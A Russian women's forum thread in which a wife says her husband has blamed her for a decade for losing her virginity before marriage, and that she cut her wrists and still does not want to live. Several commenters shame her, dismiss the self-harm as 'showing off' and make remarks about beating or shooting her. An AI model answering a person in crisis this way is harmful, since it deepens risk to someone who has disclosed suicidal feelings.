Вход
Здравствуйте, гость !
Войдите под своим именем
или Зарегистрируйтесь.
меньше минуты назад2016-12-03 13:29:26 от Гость
Здравствуйте мы смужем вместе 12 лет. есть двое детей. было всякое но последнее время стала очень мучить проблема отсутствия работы у мужа я работаю. в начале отношений училась потом была в декрете но потом постоянно работала чтобы ни случилось и как ... Подробнее
Последний комментарий
История : Грусть
38 минут назад2016-12-03 22:17:31 от Гость
Арийка*** , спасибо), писать я конечно не умею но как вам стихотворение? Все комментарии67479
Вход
Здравствуйте, гость !
Войдите под своим именем
или Зарегистрируйтесь.
Топ из раздела
Интимные истории
На работу к папе
шесть часов назад2016-12-03 16:30:38
Студент и препод
28 ноября в 23:53:36
Волосенкиии
27 ноября в 22:35:51
Комедия
27 ноября в 16:31:09
Сериалы смотрим?  ( 1 2 )
27 ноября в 16:31:08
опустить на главную
24 ноября в 07:57:38
Лев
23 ноября в 17:13:44
Интимные истории - Жизнь - катастрофа
Интимные истории : Жизнь - катастрофа     Познакомилась со своим будущим мужем в 20 лет . Парень он был удивительный, высокий, спортивный, интеллектуальный. Отношения у нас развивались красиво, страстно и целомудренно. Через месяц, когда дошло дело до близости, уже в кровати я призналась, что мужчин у меня не было. Он отреагировал уважительно и интим у нас был без секса. Через две недели его забрали в армию. Я приезжала к нему несколько раз, ходили в увольнение, были вдвоём в гостинице, говорила о свадьбе, но он меня берёг и просил подождать, пока отслужит……
Так получилось, что за время его службы я потеряла девственность….
Через год после службы в армии мы поженились. Женаты более 10 лет. Всё вроде бы хорошо: работа, достаток, ребёнок, фантастический секс, но муж постоянно упрекает (практически сразу после свадьбы ) меня в том, что я ему изменила и досталась не девственницей. Порекомендовала обратиться к психологу, но он и слушать не хочет. Главный аргумент, что он ко мне отнёсся уважительно, берёг меня, а я его посчитала тряпкой....
Кроме мужа мне никто не нужен, он - лучший, уходить от него не хочу, смотреть на других парней не могу, но и жить так невозможно, даже вены резала.
У меня в жизни была всего одна ошибка, а расплачиваться приходится всю жизнь….(((
63667
Другие Интимные истории
(89)
Violetta
14552 Violetta
Violetta offline
Репутация : 1248498
Комментариев 8863 0
12 марта 22:05:15
2016-03-12 22:05:15

Да уж, ситауция неприятнейшая. По логике, раз он берег вас, а вы его реально предали, но он вас простил, - значит любил. Но его грызет это. И он не может это отпустить. Возможно, вам надо спокойно объснить ему, что любой человек делает ошибки. ЛЮБОЙ! И вы глубоко раскаиваетесь. Пусть поверит вам , даст шанс доказать, что вы любите его (правда я сама не понимаю - как можно быстро доказать? Это покажет ваша долгая и, надеюсь, счастливая жизнь). Удачи!

Ответить
Поддерживаю Да8 / Нет0
Хорошее настроение - это когда не очень умные люди не бесят, а веселят.
рукодельница
19299 рукодельница
Рукодельница offline
Репутация : 44616
Комментариев 431 11
12 марта 22:14:25
2016-03-12 22:14:25

у меня есть одна знакомая. она работает вместе с одним мужчиной. она давно его знает, он многое ей рассказывал о себе. о семье. и вот тоже, рассказал, что пока он был в армии, его будущая супруга, которая клялась его ждать, изменила ему. ему сейчас уже далеко за 50 лет, он до сих ей этого не простил. но автор, мне например тоже не понять, ждать всего год, а вы дали слабину! или по пьяни, уж извините спросить? Женщине стоит лапшу на уши повесить, так она сразу даст.

Ответить
Поддерживаю Да0 / Нет0
Читательница
14629 Читательница
Читательница offline
  • Мисс Эрудиция
Репутация : 1095302
Комментариев 16103 6
12 марта 22:22:38
2016-03-12 22:22:38

Автор, резать вены глупо. Что это изменит то? Ничего вы не добьетесь этой показухой!

Скажите спасибо, что он вас простил вообще за такое. Значит он вас любил. Обычно за такое посылают далеко и надолго. Он вас берег, берег, а вы взяли и разменялись на какого-то придурка.

Простите, но что-то у меня сомнения, что ему поможет что-то! Ему нужен не психолог, а таблетка для стирания памяти. Расскажу случай. Есть у меня знакомый, так он гнобил свою девушку за то, что та была не девственницей (она ей была до встречи с ним), так вот он ей всю жизнь припоминал, пока отношения не развалились.

Я думаю, что вам стоит поговорить, попросить у него прощения, раскаяться и доказывать каждый день, что ваш поступок был ошибкой!

Ответить
Поддерживаю Да6 / Нет0
ТыОставьТоМгновениеНаПамятьИНе ДумайУжеОПлохомВсёЧтоПлохоВедь МожноПоправитьИПройдетНепогодаСДождем
Violetta
14552 Violetta
Violetta offline
Репутация : 1248498
Комментариев 8863 0
12 марта 22:24:08
2016-03-12 22:24:08

Читательница , что за придурок такой? я вообще не понимаю, как можно строить отношения с человеком, который за это тебя гнобит? Сам святой что ли?

Ответить
Поддерживаю Да4 / Нет0
Хорошее настроение - это когда не очень умные люди не бесят, а веселят.
Kiddi
12798 Kiddi
Kiddi offline
Репутация : 41782
Комментариев 570 8
12 марта 23:08:42
2016-03-12 23:08:42

По-сути, Ваш муж прав. Но если он все-таки женился на Вас после такого, то пусть попытается не упрекать. Иначе ни Вы, ни он счастливы не будете.

"Глав ный аргумент, что он ко мне отнёсся уважительно, берёг меня, а я его посчитала тряпкой.... " - он так и говорит? Посчитали тряпкой? По-моему, он неуверен в себе, и не только этот случай является причиной, наверное. Вам нужно доказывать его значимость, его мужество... Подумайте, как можете это делать.... И что на данный момент может подрывать его веру в себя как МУЖЧИНУ? Как это можно устранить?

Ответить
Поддерживаю Да1 / Нет0
Nothing is impossible, the word itself says I’M POSSIBLE !!!
Читательница
14629 Читательница
Читательница offline
  • Мисс Эрудиция
Репутация : 1095302
Комментариев 16103 6
12 марта 23:14:08
2016-03-12 23:14:08

Violetta, Видишь, как по разному оно бывает, одни не хотят связываться с девственницей, а другие с не девственницей и весь мозг вынесут, что как она посмела то до него... Ага, а у нее, наверное, с рождения должен быть хрустальный шар, в котором она видит, кто судьба ее, а кто не судьба, с кем можно, а с кем нельзя. А вообще, я не понимаю, что за гнобежка за прошлое? Прошлое было ДО, не стоит вообще в этом копаться! Хочешь быть с человеком, так будь, а не хочешь, так не трепи нервы ни себе, ни ей. Ну, есть вот такие, которые считают не девственниц шлюхами и второсортными. Явно это не от большого то ума.

Ответить
Поддерживаю Да2 / Нет0
ТыОставьТоМгновениеНаПамятьИНе ДумайУжеОПлохомВсёЧтоПлохоВедь МожноПоправитьИПройдетНепогодаСДождем
Гость
Гость

13 марта 02:32:21
2016-03-13 02:32:21

Читательница , Лен, ну почему сразу променяла на *придурка*?а может им был я, обольститель женского пола{#}, ты же меня не считаешь за придурка?{#}

Ответить
Поддерживаю Да1 / Нет0
Милая кошка
10885 Милая кошка
Милая кошка offline
Репутация : 586331
Комментариев 7737 13
13 марта 11:36:33
2016-03-13 11:36:33

Уважать как оказалось вас было не за что. Я вообще не понимаю как он смог на вас жениться, после того как вы ему изменили и как может доверять вам теперь, если вы даже девственницей умудрились пойти на лево,

Ответить
Поддерживаю Да9 / Нет0
Если я тебе не нравлюсь-застрелись! Я не исправлюсь.
Гость
Гость

13 марта 12:31:57
2016-03-13 12:31:57
Сдается мне, что ваш муж специально культивирует в вас чувство вины за прошлое, чтобы вить из вас веревки и превратить в послушную домашнюю прислугу.
Ответить
Поддерживаю Да1 / Нет0
Катя
Катя

13 марта 12:32:27
2016-03-13 12:32:27
Надо сделать так, чтобы это был его выбор. Моя сестра встречалась с парнем, проводила его в армию, клялись в любви, обещала ждать. На какой-то вечеринке к ней подкатил приятных молодой человек с хорошими манерами и она подумала, что она будет с ним только друзьями. Но дружба как-то незаметно для нее перетекла в большее, а через месяц она узнала, что беременна. Написала парню письмо что не дождалась, и вышла замуж. Друг армейский вернулся, понял что не сможет жить без нее и отбил ее у мужа. Ребенка усыновил. Сейчас уже есть внуки. За всю жизнь не разу не упрекнул ее, потому что она ошиблась, а он сделал сознательно свой выбор. Признайтесь, что вам очень трудно, что вы сожалеете о содеянном. Что это ваша самая большая ошибка. И что он знал об этом, когда на вас женился. Что это его выбор. Попросите не говорить вам об этом. Скажите, что вам и так очень плохо.
Ответить
Поддерживаю Да1 / Нет0
Nelli.E
20920 Nelli.E
Nelli.E offline
Репутация : 0
Комментариев 6 0
13 марта 12:32:29
2016-03-13 12:32:29

Зачем женился тогда на вас, что бы потом до старости припоминать?!

Ответить
Поддерживаю Да1 / Нет0
Гость
Гость

13 марта 12:33:02
2016-03-13 12:33:02
Читательница , Девушка обещала ждать парня, и вдруг лишилась девственности не с ним. Значит не дождалась? Или я неправильно что-то понял? Девушка неправильно поняла отношение парня. И посчитала его тряпкой, хотя он здорово поступил. Правильно. И в чем он виноват? В том, что его разменяли на дибила? Который просто попользовался? А девушка не может хранить верность нормальному парню? Жду ваши мысли!
Ответить
Поддерживаю Да0 / Нет0
Гость
Гость

13 марта 12:33:05
2016-03-13 12:33:05
Автор а ты считай не тряпкой, тех мальчиков, которым плевать на тебя. Они же в твоем понятии истинные мужики наверное, да?
Ответить
Поддерживаю Да0 / Нет0
Гость
Гость

13 марта 12:36:27
2016-03-13 12:36:27
а когда женились муж не знал что Вы уже не девственница?
Ответить
Поддерживаю Да0 / Нет0
Гость
Гость

13 марта 13:12:39
2016-03-13 13:12:39

Автор, я нельзя было ему сказать, ну что сами девственность свою испортили пальчиком, ну там гормоны играли, и решили пошалить...{#}

Ответить
Поддерживаю Да0 / Нет0
Еваника
18243 Еваника
Еваника offline
Репутация : 168914
Комментариев 1685 4
13 марта 13:22:44
2016-03-13 13:22:44

Такие вещи всегда оставляют грязный след в отношениях. Он уже никогда не сможет Вам полностью доверять. На Вашем месте я бы даже постыдилась вообще продолжать отношения... Удивительно, что он вообще на Вас женился, обычно мужчины такие вещи не прощают.

Ответить
Поддерживаю Да4 / Нет0
А в голове: "на лабутенах я..."
вовочка
вовочка

13 марта 13:28:54
2016-03-13 13:28:54
Гость, Конечно знал) Я как то влюбился в малолетку в нашем районе, а потом вижу ее развратные действия, да еще и такое рассказали(, я думал брешут, спросил у нее, а она -"Тайну не кому". Так и непришла, ведать правда(
Ответить
Поддерживаю Да0 / Нет0
Читательница
14629 Читательница
Читательница offline
  • Мисс Эрудиция
Репутация : 1095302
Комментариев 16103 6
13 марта 15:45:38
2016-03-13 15:45:38

Гость, да, я считаю, что она не дождалась! Почему она не могла подождать его, тем более будучи девственницей, раз она его так любила?

Мужа никто ни в чем не обвиняет. То, что он женился после такой измены и такого предательства - это доказывает его любовь. А вот ее любви не видно, сначала разменялась на левого чувака, а потом мужа еще и тряпкой называет. Наверное, он был бы не тряпкой, если бы вломил бы ей пару раз.

Ответить
Поддерживаю Да2 / Нет0
ТыОставьТоМгновениеНаПамятьИНе ДумайУжеОПлохомВсёЧтоПлохоВедь МожноПоправитьИПройдетНепогодаСДождем
Зайка 88
19822 Зайка 88
Зайка 88 offline
Репутация : 42537
Комментариев 1007 2
13 марта 15:50:05
2016-03-13 15:50:05

Читательница , а мне кажется, что он ее специально берег, чтобы проверить - будет изменять или нет. .. Вот она и проверку не прошла... {#} Представляю как ему обидно тогда было, да и сейчас не может этого не забыть, не простить...

Ответить
Поддерживаю Да1 / Нет0
Самые ценные минуты в жизни - рядом с любимым человеком!
Читательница
14629 Читательница
Читательница offline
  • Мисс Эрудиция
Репутация : 1095302
Комментариев 16103 6
13 марта 15:59:01
2016-03-13 15:59:01

Зайка 88, ну, так часто и делают. Если не девственница, то сложнее доказать, что была измена, а тут и доказывать ничего не нужно, сразу все понятно, что где-то погуляла. Был даже вот недавно случай, что парень с девушкой встречались, она думала, что все у них будет, а он сказал, что когда вернется, то тогда только и будет, а пока он потерпит. В рассказанной мной ситуации он не столько берег, сколько как раз таки хотел именно проверить. Вот только когда проверку не проходят, то разбегаются, а муж автора женился, может ни столько он и для проверки все это затевал, сколько действительно любил и берег...

Ответить
Поддерживаю Да1 / Нет0
ТыОставьТоМгновениеНаПамятьИНе ДумайУжеОПлохомВсёЧтоПлохоВедь МожноПоправитьИПройдетНепогодаСДождем
Еваника
18243 Еваника
Еваника offline
Репутация : 168914
Комментариев 1685 4
13 марта 16:02:36
2016-03-13 16:02:36

Интересно, неужели прям так чесалось, что невозможно было дождаться любимого человека? Я когда парня ждала из армии даже допускала мысли о другом... Год не так уж долго.

Ответить
Поддерживаю Да5 / Нет0
А в голове: "на лабутенах я..."
Violetta
14552 Violetta
Violetta offline
Репутация : 1248498
Комментариев 8863 0
13 марта 16:08:18
2016-03-13 16:08:18

Еваника, не говори, в царские времена (когда-то оооочень давно) 25 лет служили

Ответить
Поддерживаю Да0 / Нет0
Хорошее настроение - это когда не очень умные люди не бесят, а веселят.
Зайка 88
19822 Зайка 88
Зайка 88 offline
Репутация : 42537
Комментариев 1007 2
13 марта 16:41:15
2016-03-13 16:41:15

Читательница , вот какие парни хитрые! А как нам проверить - изменял или нет? А просто никак!!! Как один знакомый мне говорил, если женщина изменяет - то это просто конец света! а если мужчина, то ничего страшного, с кем не бывает... Я ему, конечно, пыталась доказать, что измена - это всегда очень плохо, независимо кто изменяет - он или она, но видимо некоторые мужчины думают иначе...{#}

Ответить
Поддерживаю Да1 / Нет0
Самые ценные минуты в жизни - рядом с любимым человеком!
=Юля=
20949 =Юля=
=Юля= offline
Репутация : 1126
Комментариев 38 1
14 марта 09:06:10
2016-03-14 09:06:10

Читательница , Вены резала не для показухи, состояние такое было, жить не хотелось да и не хочется. А насчёт таблетки вы правы. Муж будет помнить об измене всю жизнь. И вопрос не столько об об измене, сколько об отношении его ко мне и соответственное моём к нему, которое я не оценила.

Ответить
Поддерживаю Да0 / Нет0
=Юля=
20949 =Юля=
=Юля= offline
Репутация : 1126
Комментариев 38 1
14 марта 09:09:06
2016-03-14 09:09:06

Violetta, Вы наверное не внимательно прочитали историю. Ответ типа "сам дурак" не совсем приемлем. Для меня главный вопрос: как жить слюбимым человеком?

Ответить
Поддерживаю Да0 / Нет0
=Юля=
20949 =Юля=
=Юля= offline
Репутация : 1126
Комментариев 38 1
14 марта 09:15:51
2016-03-14 09:15:51

Катя, Мне трудно, я сожалею, это моя большая ошибка, я бы многое отдала, чтобы возратить время назад, чтобы как-то всё исправить, но это уже невозможно. И чем дальши, тем жизнь для меня всё сложнее и невозможнее

Ответить
Поддерживаю Да0 / Нет0
=Юля=
20949 =Юля=
=Юля= offline
Репутация : 1126
Комментариев 38 1
14 марта 09:22:26
2016-03-14 09:22:26

Kiddi, Всё очень сложно. На работе у меня все знали, что у меня парень в армии. И совратитель оказался именно с работы. Муж считает, что о моей измене знают все и оносятся ко мне как к бл... и, а его считают тряпкой, что на такой женился.

Ответить
Поддерживаю Да0 / Нет0
=Юля=
20949 =Юля=
=Юля= offline
Репутация : 1126
Комментариев 38 1
14 марта 09:36:53
2016-03-14 09:36:53

Читательница , Муж не может понять, как девушка которая хотела за него замуж, приезжала к нему в армию с мамой могла ему изменить.

Ответить
Поддерживаю Да0 / Нет0
=Юля=
20949 =Юля=
=Юля= offline
Репутация : 1126
Комментариев 38 1
14 марта 09:39:37
2016-03-14 09:39:37

Violetta, Он в ошибку не верит, считает, что девственность меня тяготила и я оторвалась в его отсутствии.

Ответить
Поддерживаю Да0 / Нет0
Еваника
18243 Еваника
Еваника offline
Репутация : 168914
Комментариев 1685 4
14 марта 09:45:58
2016-03-14 09:45:58

=Юля=, 9=Юля=, я бы на месте мужа тоже так думала...

Ответить
Поддерживаю Да1 / Нет0
А в голове: "на лабутенах я..."
Violetta
14552 Violetta
Violetta offline
Репутация : 1248498
Комментариев 8863 0
14 марта 10:13:33
2016-03-14 10:13:33

=Юля=, а где вы увидели, что я написала, что ВАШ муж дурак? Может вы невнимательно читаетет ответы , а?

Ответить
Поддерживаю Да0 / Нет0
Хорошее настроение - это когда не очень умные люди не бесят, а веселят.
=Юля=
20949 =Юля=
=Юля= offline
Репутация : 1126
Комментариев 38 1
14 марта 11:55:18
2016-03-14 11:55:18

"Сам дурак" это аналогия к "сам святой что ли?". Violetta, 12 марта 22:24:08

что запридурок такой? я вообще не понимаю как можно строитьотношения с человеком который заэто тебя гнобит? Сам святой что ли?

Ответ типа "сам дурак" не совсем приемлем. Для меня главный вопрос как жить с любимым человеком?

" Гнобление" в чём-то заслужила. Но это не может продолжаться всю жизнь. В моей истории написано, что муж удивительный и хотел сделать всё красиво, а получилось наоборот и с каждым годом жизнь всё печальней.

Ответить
Поддерживаю Да0 / Нет0
Гость
Гость

14 марта 11:59:43
2016-03-14 11:59:43

=Юля=, Вы не правильно поняли, Виолетта имела виду знакомого Читательницы, а не вашего мужа{#}

Ответить
Поддерживаю Да1 / Нет0
Violetta
14552 Violetta
Violetta offline
Репутация : 1248498
Комментариев 8863 0
14 марта 12:59:31
2016-03-14 12:59:31

=Юля=, а вы не видите, что этот коммент адресован Читательница , которая написала, что у нее есть ЗНАКОМЫЙ, который всю жизнь гнобил свою девушку за то, что она не девственница? Что тут непонятного? Конечно, плохо, что сейчас не видно текст коммента, к которому обращаешься, а только адресата. Так что про вашего мужа, что ОН ДУРАК, я не писала. Я вообще его считаю нормальным человеком, просто он взял на себя непосильную ношу. Он пытался вас простить (очевидно, любил сильно), но не смог это вынести. Не для него испытание.

А как бы я поступила - я написала в самом первом комменте.

Ответить
Поддерживаю Да1 / Нет0
Хорошее настроение - это когда не очень умные люди не бесят, а веселят.
Lilianka
17559 Lilianka
Lilianka offline
Репутация : 58668
Комментариев 897 15
14 марта 13:46:38
2016-03-14 13:46:38

Дааа уж.. ситуация. Уж простите, автор, хоть убейте, не понимаю как можно было умудриться изменить.. Гм. Честно. Судя по комментариям и изложенной истории, Вы вполне адекватный, нормальный человек, но потерять девственность с одним любя другого, который Вас так оберегал как минимум невероятно{#}
Я сама в 20 лет была невинна (сейчас 23), и мужчина у меня был лишь один - мой муж. Измену не простила бы, я знаю себя. Возможно первое время смогла как-то себя успокоить, но не смогла бы жить с человеком, который однажды предал.
Я вашего мужа очень понимаю, да он не совсем прав что постоянно Вам говорит о Вашей глупости. Но с другой-то стороны, Вы представляете как ему было обидно, и возможно больно, что Вы так поступили?
Вам нужно сесть и поговорить с ним на чистоту - сможет ли он простить до конца и не корить Вас всю жизнь не на словах, а правда простить и отпустить эту ситуацию как прошлое. Ему тяжело. Это видно. Возможно он даже жалеет что женился, поэтому невольно Вам и напоминает о Ващем поступке. Поговорите с ним. Если молчать - дальше будет хуже.

Ответить
Поддерживаю Да3 / Нет0
Если бы наши глаза видели душу, а не тело, как же сильно отличалось бы наши идеалы красоты..
Moody
20123 Moody
moody offline
Репутация : 138642
Комментариев 1220 7
14 марта 14:04:16
2016-03-14 14:04:16

Ситуация не из простых. Не буду писать, что мне тоже непонятен ваш поступок, об этом писали выше, да и смысла нет об этом говорить, вы и так все знаете. Вопрос в том, что с этим делать. Для начала попытайтесь с ним поговорить. Решить вопрос: сможет он с этим жить или нет, сможет простить вас или так и будет это до конца жизни тянуться (а мне кажется, что так оно будет). Если нет, то не стоит держать его и самой держаться за него. Отпустите. Пусть найдет себе другую девушку, может на его взгляд более достойную. Вы не сможете жить так. И не должны. Вы не должны теперь всю жизнь расплачиваться за вашу ошибку. Это неправильно. Дойдете до ручки, и заболеете чем нибудь не дай Бог. Все болезни от нервов. вены резали- это уже плохой признак, очень плохой я бы сказала.

У меня тоже была непростая ситуация с мужем. И когда я поняла, что вместе уже невыносимо, и что я от нервного напряжения схожу с ума, я попыталась поговорить с ним. Он не захотел (моей вины большой кстати особо не было). Я сказала: давай поживем отдельно и разберемся. Ушла к маме. И отдохнула и морально и физически. Мама своими пирожками, задушевными разговорами оживила меня. Ну и я смогла на ситуацию по-другому посмотреть. Муж за это время тоже многое переосмыслил. Я не говорю, что уходить-это панацея. Но искать выход вам нужно. И не стоит ни один мужчина того, чтобы резать вены, поверьте. Как бы вы его не любили.

Ответить
Поддерживаю Да2 / Нет0
Все люди хотят, чтобы было по ихнему. Но по ихнему не будет, потому что нет такого слова.
=Юля=
20949 =Юля=
=Юля= offline
Репутация : 1126
Комментариев 38 1
14 марта 14:04:44
2016-03-14 14:04:44

Lilianka, У меня на работе были неприятности, нашёлся "утешитель" , пару раз пригласил в кино с подружкой, после кино пригласил на чай..... и утешил.... Муж не забудет никогда. Просто он неможет понять как девушка, хотящая за него замуж (именно я предложила пожениться) могла так поступить. Какие либо доводы о трудностях его не убеждают. Да он прав. Мне было уже 21 и должна была понять, что мужчины приглашают домой девушек не радио послушать, хоть я и была с подружкой, но та незаметно ушла.

Ответить
Поддерживаю Да0 / Нет0
вовочка
вовочка

14 марта 14:14:04
2016-03-14 14:14:04
=Юля=, Да забей, не принимай это близко к сердцу, таких семей 90%. \r\nВы уже семья, ему надо было до свадьбы думать, а теперь что?, не вернут того. \r\nКонечно он не забудет, это уже в крови. \r\nТебе надо стараться нечем не напоминать - словом, делам, не каждый же день скандалите, в основном при скандалах вспоминается.
Ответить
Поддерживаю Да0 / Нет0
Костя
Костя

14 марта 14:16:59
2016-03-14 14:16:59
=Юля=, Но это не может продолжаться всю жизнь.... Я как то просил одну, что бы пришла и изверилась, за то что флиртовала, но она не захотела(, не любила или было что то серьезнее .
Ответить
Поддерживаю Да0 / Нет0
Namira
20965 Namira
Namira offline
Репутация : 2054
Комментариев 86 1
14 марта 14:17:39
2016-03-14 14:17:39

БесШаБаШнЫй ЭлЬф )), вот такие и губят женский пол )) и вселяют комплексы мужскому

Ответить
Поддерживаю Да0 / Нет0
Одинок только тот, кто хочет быть одиноким.
вовочка
вовочка

14 марта 14:17:49
2016-03-14 14:17:49
Lilianka, не понимаю как можно было умудриться изменить..... Что тут не понятного? небыло должного воспитания. Напилась на гулянке и вперед поцелуй, зажималки, ласки, понравилось.
Ответить
Поддерживаю Да0 / Нет0
Lilianka
17559 Lilianka
Lilianka offline
Репутация : 58668
Комментариев 897 15
14 марта 14:22:29
2016-03-14 14:22:29

=Юля=, Вы же не маленькая девочка, Вы могли вырваться убежать. Или "утешитель" силой Вас брал?
Я очень понимаю вашего мужа. Мои первые отношения закончились практически не начавшись, из-за измены парня. Я простила, но отпустила. Для меня измена - это сродни предательству.

Ответить
Поддерживаю Да2 / Нет0
Если бы наши глаза видели душу, а не тело, как же сильно отличалось бы наши идеалы красоты..
Максимум
7217 Максимум
максимум offline
Репутация : 48434
Комментариев 1070 7
14 марта 14:26:52
2016-03-14 14:26:52

Я не знаю насколько мое мнение правильное, но я бы при ближайшем упоминании этого момента ответила ему: " Да я неправа была, я уже тысячу раз извинялась и миллион раз об этом пожалела (если это так у вас автор конечно), Но ты знал об этом когда женился/ узнал как только мы поженились(незнаю как у вас) Ты принял это. Я восхищена силой твоей любви ко мне. Но зачем ты постоянно мне об этом напоминаешь. Этим моментом ты отравляешь жизнь нам обоим. Поэтому либо прости уже меня наконец, либо если не в силах этого сделать ну давай уже расстанемся. Но дальше такого же я не потерпля"

Тут одна беда, есть риск что он уйдет, хотя не очень большой.

Хотя я бы на самом деле все это сказала короче:" Знал? знал Согласился? согласился. Теперь либо отвали с претензиями либо вон дверь" Но так я не советую, несколько конфликтная формулировка.

Мне кажется автор главная беда у вас в том что вы до сих пор чувствуете себя виноватой, поэтом и ваш муж так же воспринимает. Вам нужно уйти от чувства вины. Поверьте сами в то что вы не виноваты, срок давности истек. Вс уже не за что судить. И тогда ваш муж постепенно начнет так же воспринимать. А то если на каждое: " Изменила мне негодяйка" будете виниться и извиняться он и будет вас постоянно винить. Я конечно не знаю как у вас этот разговор происходит, поправьте если что. Это лишь мое предположение, мое мнение. Поставьте себя. Как вы к себе отнесетесь так и к вам будут относиться. Но опять таки есть риск его потерять. Но тут уж решать вам

Ответить
Поддерживаю Да5 / Нет0
Гость
Гость

14 марта 14:51:13
2016-03-14 14:51:13

Namira, не понял вашего комментария, о чем вы, кто губит? и кто вселяет комплексы у мужчин?{#}

А насчёт её мужа , моё мнение такое, что он чистый лошара... и пусть обижается автор на меня, во-первых девушка была ещё не замужем за него, и это не считается изменой, или он считал что она уже его личная вещь, , в таком возрасте ещё не полностью девушка может разобраться в своих чувствах, и естественно где-то может у неё были сомнения, а может и влюбилась в кого то ещё сильней, как бы то не было у него был выбор порвать с ней, но если уже женился сиди и молчи а не вспоминай свои рога , иначе они могут ещё раз вырасти... Надо же , девственная плева , дороже отношений вдруг стало, после стольких лет... не верю этому, просто поднадоела ему, и ищет себе оправдание что бы тоже изменить ей...

Ответить
Поддерживаю Да1 / Нет1
Гостья
Гостья

14 марта 14:56:53
2016-03-14 14:56:53
Такой хороший парень, а кому достался? Девушке, которая не может удержать одно место. Бедный, жалко его. А таких, как автор, надо расстреливать.
Ответить
Поддерживаю Да0 / Нет0
Violetta
14552 Violetta
Violetta offline
Репутация : 1248498
Комментариев 8863 0
14 марта 14:59:46
2016-03-14 14:59:46

Гостья, вы имеете ввиду, которые изменяют вообще, или которые достаются не девственницами? А может, которые не дождались из армии?{#} Тогда численность населения резко упадет{#}

Ответить
Поддерживаю Да0 / Нет0
Хорошее настроение - это когда не очень умные люди не бесят, а веселят.
=Юля=
20949 =Юля=
=Юля= offline
Репутация : 1126
Комментариев 38 1
14 марта 15:01:12
2016-03-14 15:01:12

Максимум, Вы правильно пишите, но упрёки не всегда вырадаются прямо. Муж пытается "установить истину", как он говорит понять причину моего поступка. Расспрашивает с кем это было и когда, куда я с ним ходила, как к нему пришла, как это было, о чем думада до того, о чем думалаи после, как реагировала, почему не осталась с искусителем, почему возвратилась к нему и т. д.

Ответить
Поддерживаю Да0 / Нет0
Максимум
7217 Максимум
максимум offline
Репутация : 48434
Комментариев 1070 7
14 марта 15:01:44
2016-03-14 15:01:44

Да что вы все на нее накинулись. Ну не права да. согласна. Она же пришла не спрашивать, права, не прва была. Как с мужем жить.

Ответить
Поддерживаю Да0 / Нет0
Violetta
14552 Violetta
Violetta offline
Репутация : 1248498
Комментариев 8863 0
14 марта 15:04:22
2016-03-14 15:04:22

Максимум, вот мое мнение - уже жизни не получится. Парень не смог ее простить. Себя гложет и ее тоже. Наверное, он надеялся, что все забудется, но не получилось

Ответить
Поддерживаю Да0 / Нет0
Хорошее настроение - это когда не очень умные люди не бесят, а веселят.
=Юля=
20949 =Юля=
=Юля= offline
Репутация : 1126
Комментариев 38 1
14 марта 15:09:26
2016-03-14 15:09:26

БесШаБаШнЫй ЭлЬф )), Я тоже говорила, что измена до брака это не считается, но.... Начнём с того, что он мог быть у меня первый, но он это не сделал из-за уважения, считая, что мне уже 20 и я должна достаться уже мужу, второе - я сама предложила ему жениться, третье - несколько раз приезжала к нему в армию, в том числе со своей мамой, ходила к его родителям на правах невестки. Так что решайте измена это или нет в его глазах и вообще.....

Ответить
Поддерживаю Да0 / Нет0
Гость
Гость

14 марта 15:12:31
2016-03-14 15:12:31

10 лет упрекать , что не досталась девственницей... пипец,{#} автор пойдите зашейтесь, пусть он пройдёт наконец-то этот процесс, и успокоиться..{#}

Ответить
Поддерживаю Да3 / Нет0
Читательница
14629 Читательница
Читательница offline
  • Мисс Эрудиция
Репутация : 1095302
Комментариев 16103 6
14 марта 15:14:36
2016-03-14 15:14:36

БесШаБаШнЫй ЭлЬф )), ага, если все было так легко и просто! Дело же в девственности, как в какой-то пленке, а в предательстве! Тут зашиться не поможет, тут только таблетка для стирания памяти нужна. {#}

Ответить
Поддерживаю Да0 / Нет0
ТыОставьТоМгновениеНаПамятьИНе ДумайУжеОПлохомВсёЧтоПлохоВедь МожноПоправитьИПройдетНепогодаСДождем
Максимум
7217 Максимум
максимум offline
Репутация : 48434
Комментариев 1070 7
14 марта 15:15:38
2016-03-14 15:15:38

Violetta, Возможно. Тут еще и от личности мужа зависит, мне вообще показлось, что он "питается" этой ситуацией, чтобы жену держать в состояниии вечно виноватой, для того чтобы было проще манипулировать ей, а она потакает ему в этом своим чувством вины. Пока она не перестанет чувствовать себя виноватой, все так и будет. Как только голову поднимет он либо успакоиться либо они расстануться.

Ответить
Поддерживаю Да3 / Нет0
Максимум
7217 Максимум
максимум offline
Репутация : 48434
Комментариев 1070 7
14 марта 15:17:13
2016-03-14 15:17:13

=Юля=, Ответье му что за 10 то лет не помните что там и к чему было, совсем еще девченко были, ветер в голове.

Ответить
Поддерживаю Да0 / Нет0
Гость
Гость

14 марта 15:19:46
2016-03-14 15:19:46

Читательница , Лен, ну ч думаю, если любишь на самом деле, то можешь простить, тем более, понять, 2 года большой срок, возраст такой что гормоны играют, зачем все время напоминать и унижать человека за это... , лично для меня всегда имеет значение настоящее, те чувства что живу сегодня, а не прошлым, все мы делаем ошибки, нет не безгрешных, но именно любовь нам позволяет прощать...

Ответить
Поддерживаю Да0 / Нет0
=Юля=
20949 =Юля=
=Юля= offline
Репутация : 1126
Комментариев 38 1
14 марта 15:20:59
2016-03-14 15:20:59

БесШаБаШнЫй ЭлЬф )), Были мысли насчёт гименопластики, что бы как то утешить мужа, но здесь вопрос скорее не в куске кожи. Здесь вопрос, скорее в нравственнорй чистоте. Если девушка любит, тем более думает выйти замуж, никаких мыслей о каких-то парнях быть не должно. Да их и не было и нет. А тут такое.... Если и зашивать, то нужно это было делать сразу, чтобы никто ничего не не мог подумать, а искусителя в расход...

Ответить
Поддерживаю Да3 / Нет0
Гость
Гость

14 марта 15:30:24
2016-03-14 15:30:24

=Юля=, Я понимаю там на востоке, девственность имеет большое значение, в России, не знаю как, но у нас на западе, к этому относится безразлично, в смысле нет ничего такого если девушка имела несколько отношений до брака, так как считается что лучше будет совместимость с партнёром, с сексе, в характере, да и в другом, плане и мне это по начало как то развращением казалось, но зато вижу у них здесь в браке, в основном гармония, мало разводов... измен тоже очень мало, потому что приходят к брака через какой то опыт, а не с первый и единственным ....

Ответить
Поддерживаю Да0 / Нет0
=Юля=
20949 =Юля=
=Юля= offline
Репутация : 1126
Комментариев 38 1
14 марта 15:34:04
2016-03-14 15:34:04

Читательница , Максимум, Это вы правильно подметили, дело в предательстве и в нравственной чистоте. Дело в том, что муж у меня слишком правильный, правильный и искренний. А мой поступок для него неизлечимая болезнь в тяжёлой форме.

Ответить
Поддерживаю Да1 / Нет0
Гость
Гость

14 марта 15:51:05
